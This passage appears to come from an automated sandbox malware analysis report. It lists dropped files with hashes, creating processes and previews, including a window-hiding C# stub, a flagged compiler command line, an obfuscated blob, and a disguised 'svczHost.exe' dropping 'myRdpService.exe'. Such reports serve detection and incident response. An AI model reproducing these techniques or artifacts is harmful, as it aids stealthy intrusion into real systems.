                                                                                                                          SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                                                          MD5:6E7BC02C23E28738F9898185137720DB
                                                                                                                          SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                                                          SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                                                          SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                                                          Malicious:false
                                                                                                                          Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }

                                                                                                                          C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):371
                                                                                                                          Entropy (8bit):5.198347671521723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2KJjq23fpB0zxs7+AEszIKJjq23fpbn:p37Lvkmb6K9FhGWZEYFhb
                                                                                                                          MD5:6CB88ADE99C1832FAA49420BBB71270F
                                                                                                                          SHA1:0DCA4631B8E636675CD7E111EF5DE47DC7CE73DB
                                                                                                                          SHA-256:D8682FB3ED589C2BD429E4AE9F584610A49E99132796CD48D2F5A665632DED47
                                                                                                                          SHA-512:24B26A396BA02482D230D77348AF510D88F606EC266DD58D12A2FC63E66695FD616BE00559B23B6E395BC06B3054AFB2492C25ADCB8D3A2304679A10AB43C405
                                                                                                                          Malicious:true
                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.0.cs"

                                                                                                                          C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3072
                                                                                                                          Entropy (8bit):2.787999039767953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:etGSKJ2JJi8R86QMBTAhetkZfMZ43+WI+ycuZhNYakSkPNnqI:6JNR9ZoRJMy3l1ulYa3kqI
                                                                                                                          MD5:111DBBF8A406B88BB12EF2268F0AD5DA
                                                                                                                          SHA1:7E6AF549BA6079A020ABECD086B7F03D62ED988D
                                                                                                                          SHA-256:ED9EAC49BA0A9DB757836BC1562FA23D4B3394922E2766FAA1147AA7A7A32DF0
                                                                                                                          SHA-512:AE2B86023AF73DEEF69452275993FE512FD61F9BDA999F5D6A5A4F160AA9787EC455EDF88746630FF43CAAE902E1E42804D531E856DBE86E147139D70A754143
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module

                                                                                                                          C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.out

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):872
                                                                                                                          Entropy (8bit):5.30426450850285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:KhId3ka6KnhXE+haKax5DqBVKVrdFAMBJTH:ykka6CFE+EK2DcVKdBJj
                                                                                                                          MD5:2E325C44DD7D049F8D0C80CCDBEA877A
                                                                                                                          SHA1:664AB08ADE008716F3A331D5A5ED7FC1947E7C17
                                                                                                                          SHA-256:0925374AF51B879FF69EB97F8574A2F18974B5F6888B42AF9E94B54C98B11FEF
                                                                                                                          SHA-512:F9D6314652ACC46149F4F9DA2BE66591865D91C53C023F8C3AF5F0649908B2F9008933871AA75D4E49DD16B5C90D7C33549DB7F62BCC994BA7FB44186F6AA163
                                                                                                                          Malicious:false
                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2F7SMZ1K1ECB75YBIQHX.temp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7238765231091286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TAX7C5jTCf/AS65kvhkvCCtItnORgHW2tnORgHU:TTySenQ94nQ1
                                                                                                                          MD5:B99A078A3418E26004403CAECA0D4F03
                                                                                                                          SHA1:B06F6290854EDBEC340AD55D314E9387C6DE9E14
                                                                                                                          SHA-256:01F905A0D2899345EA7556E090852A1F435A6A1E2C90D2C2214EC4625C5D275A
                                                                                                                          SHA-512:0A576C2BCF95722A1B6F3519EBB196262B53E86CA3495042DE60665124F0E6F58B75B83ECD7120046C2BD9DCEE87EA5345D0F631AB9BAA450959E864C58687A8
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ......A.....<R..1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....,....1...$s..1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYBO.............................A.p.p.D.a.t.a...B.V.1.....hY;O..Roaming.@......&W.<hY;O...........................'B.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYCO...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY2...Windows.@......&W.<hYDO............................W.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hYDO....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hYDO....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hYDO..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYDO....8...........

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7286571582377963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GAX7C55uCfaAC65kvhkvCCtItnORgHW2tnORgHU:GTQienQ94nQ1
                                                                                                                          MD5:E30D548C9C767F25510E9F7D4CDC7DE8
                                                                                                                          SHA1:DFE976FB22A35149985F6B2B7DAA2E1625345B00
                                                                                                                          SHA-256:C3B51D18573382B058B2C13517F8C80AD9C1A916DE6FB66818C939AD8FB43287
                                                                                                                          SHA-512:72AED355F95619DABFF1041A6E3A342DF112213E89DCA915DD16AFBF38A73B161F2A4084D3096EB9B58E9DA805653681CD09D22A47F8E02B673BE78EFE726D7A
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ......A.....<R..1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....,....1..-.T..1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYBO.............................A.p.p.D.a.t.a...B.V.1.....hY;O..Roaming.@......&W.<hY;O...........................'B.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYCO...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY2...Windows.@......&W.<hY2.............................W.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYDO....8...........

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF63b5f0.TMP (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7286571582377963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GAX7C55uCfaAC65kvhkvCCtItnORgHW2tnORgHU:GTQienQ94nQ1
                                                                                                                          MD5:E30D548C9C767F25510E9F7D4CDC7DE8
                                                                                                                          SHA1:DFE976FB22A35149985F6B2B7DAA2E1625345B00
                                                                                                                          SHA-256:C3B51D18573382B058B2C13517F8C80AD9C1A916DE6FB66818C939AD8FB43287
                                                                                                                          SHA-512:72AED355F95619DABFF1041A6E3A342DF112213E89DCA915DD16AFBF38A73B161F2A4084D3096EB9B58E9DA805653681CD09D22A47F8E02B673BE78EFE726D7A
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ......A.....<R..1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....,....1..-.T..1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYBO.............................A.p.p.D.a.t.a...B.V.1.....hY;O..Roaming.@......&W.<hY;O...........................'B.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYCO...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY2...Windows.@......&W.<hY2.............................W.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYDO....8...........

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YOKMT16VN68RZOVU2PO9.temp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7286571582377963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GAX7C55uCfaAC65kvhkvCCtItnORgHW2tnORgHU:GTQienQ94nQ1
                                                                                                                          MD5:E30D548C9C767F25510E9F7D4CDC7DE8
                                                                                                                          SHA1:DFE976FB22A35149985F6B2B7DAA2E1625345B00
                                                                                                                          SHA-256:C3B51D18573382B058B2C13517F8C80AD9C1A916DE6FB66818C939AD8FB43287
                                                                                                                          SHA-512:72AED355F95619DABFF1041A6E3A342DF112213E89DCA915DD16AFBF38A73B161F2A4084D3096EB9B58E9DA805653681CD09D22A47F8E02B673BE78EFE726D7A
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ......A.....<R..1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....,....1..-.T..1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYBO.............................A.p.p.D.a.t.a...B.V.1.....hY;O..Roaming.@......&W.<hY;O...........................'B.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYCO...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY2...Windows.@......&W.<hY2.............................W.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYDO....8...........

                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........................................................

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_5vrvb2i4.4j1.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_ckcuig0x.u4p.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_in0smxsw.1qj.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_ndpyd4g4.ruh.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_qqdbit0k.v0y.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_uuajvkix.uo0.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_xl2lhnnp.nvi.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_yhroudkl.kef.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Windows\Temp\deviceId.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):37
                                                                                                                          Entropy (8bit):4.185823555333621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:1FvBhiaTin:Vhun
                                                                                                                          MD5:2E34892691A39C064B28C2196A4735CB
                                                                                                                          SHA1:3037D60AA679A60A2A690C9EB314C27E8DB33452
                                                                                                                          SHA-256:7E677E793E94E3C36E5016ABDA2CF6E6B9E3BA3AEC1DF05E77CC3771967D219E
                                                                                                                          SHA-512:63323EB0221FA1FE3A83C65F75803AEE76A338D0685E1036BFAB1EA95636E221471D7CC7CA0D040B8CB183A2F5F8C6C892AD65AF0EA87AA9EB4588E435FE0D81
                                                                                                                          Malicious:false
                                                                                                                          Preview:.ECA4E7F645CEABCF141D602CC3089672..

                                                                                                                          C:\Windows\Temp\file

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8351232
                                                                                                                          Entropy (8bit):6.870213524632391
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:c6ELl9Xn8eQO54RgwIL6gTayjL9rjX27v/tIDZaFaOgj:c6EHXBQbRE5Tayjhrj2QaFaOS
                                                                                                                          MD5:0F611184B8A15C73AD43B82BDE807849
                                                                                                                          SHA1:4FBE94B19F1C69BA5ED4EF6DE134FAEC1B5B7270
                                                                                                                          SHA-256:2E77D02BBB8C853FE46B0CDC0D98A96CEF2C3DCB58CD98906CB1A2306F3213A4
                                                                                                                          SHA-512:C02A1D9646C662AFBD722F67AE141B6C8B75417AB800A605E085A02B95AECE0372CC8BFB5931820D586928E1A2F0EC5BFA56DA8C7E7B7204FAA8ECF2ABD63C29
                                                                                                                          Malicious:false
                                                                                                                          Preview:L[......................A............................................... ..M. Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/...%.........v...................._...............Z.......Z...............Z.......[.......[......Shbi............QD..e......f..........#....(..F..G8...............A.............................q............a..........................................)..Y...i)..U....A.......q..E............Q......1...........................).....A.............^............................./udyu...y&.......)..................!..a/l`o`fde..:..A....:..-..............!..aixes`ude......F........................./se`u`..]>3...^..A3...F.............A..A/e`u`........Q...o....{.............A.../qe`u`..E....q........{.............A..A/srsb........A.......W~.............A..A/sdmnb.......Q.......]~.............A..C........................................................................................................................................................................................

                                                                                                                          C:\Windows\Temp\log_rdp_08112024_04.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Temp\myRdpService.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32
                                                                                                                          Entropy (8bit):3.941428031846024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Kf2XrLmbAd1y:KjbB
                                                                                                                          MD5:CC72CA46F7090FE6AD9B7569FF48DA14
                                                                                                                          SHA1:223BEB100E5FA3A8C8BCF3CE66542352332DE26C
                                                                                                                          SHA-256:B9DA5F72898E7BD46E0B95E1DA1A4D195F0AE4E00441A9EC4E84E24D04D111D2
                                                                                                                          SHA-512:A16EDC276B5633EFB77C7ABA21F37B2564A3533011D1687F0064003733931019CA21BFB098B7B868211AEBC393A30A3DAC278A480439CA01D73BE16994E429CB
                                                                                                                          Malicious:false
                                                                                                                          Preview:16:59:52 - Internet connection..

                                                                                                                          C:\Windows\Temp\log_rdp_08112024_05.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Temp\myRdpService.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):174
                                                                                                                          Entropy (8bit):4.341699764439658
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:L91jxSFWAXWTbMWR4DFdBHASNuFWExFdBHMW6dkeUSf35gWAXWTbMWR4DFdBHASV:B1osAXI4WcdB4wcdqWALf3dAXI4WcdBV
                                                                                                                          MD5:F7D0FC3011AFE8CEEDB8BC40B7756740
                                                                                                                          SHA1:10FA31350A17C89E00DAC9E59B052EBEC2487149
                                                                                                                          SHA-256:7FD43200A90C2822EA4E277E9FB63B227EC8D8804B320AE1A33F79E4FEFB6127
                                                                                                                          SHA-512:65484871204671C0E755308C4809B93D0545A846CD4B3EB7406E16B6A0CDC7EEA421B214A88C2B33875E4124167A6E4B8CD90575637A470854FBB062081EC9D3
                                                                                                                          Malicious:false
                                                                                                                          Preview:17:00:03 - The server returned status code '404' when status code '101' was expected...17:00:05 - The server returned status code '404' when status code '101' was expected...

                                                                                                                          C:\Windows\Temp\myRdpService.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Temp\svczHost.exe
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9427456
                                                                                                                          Entropy (8bit):6.890384949334134
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:FagXMQc5xC9yZAaynfX9lvlJIg/EX4AAXC06GM3NOC02kf:DXMNYyGft7JIg/dAAXkGcu2
                                                                                                                          MD5:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                                                          SHA1:44C482F52EE997816D2582CF1D1C0A5295BA8DC9
                                                                                                                          SHA-256:5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
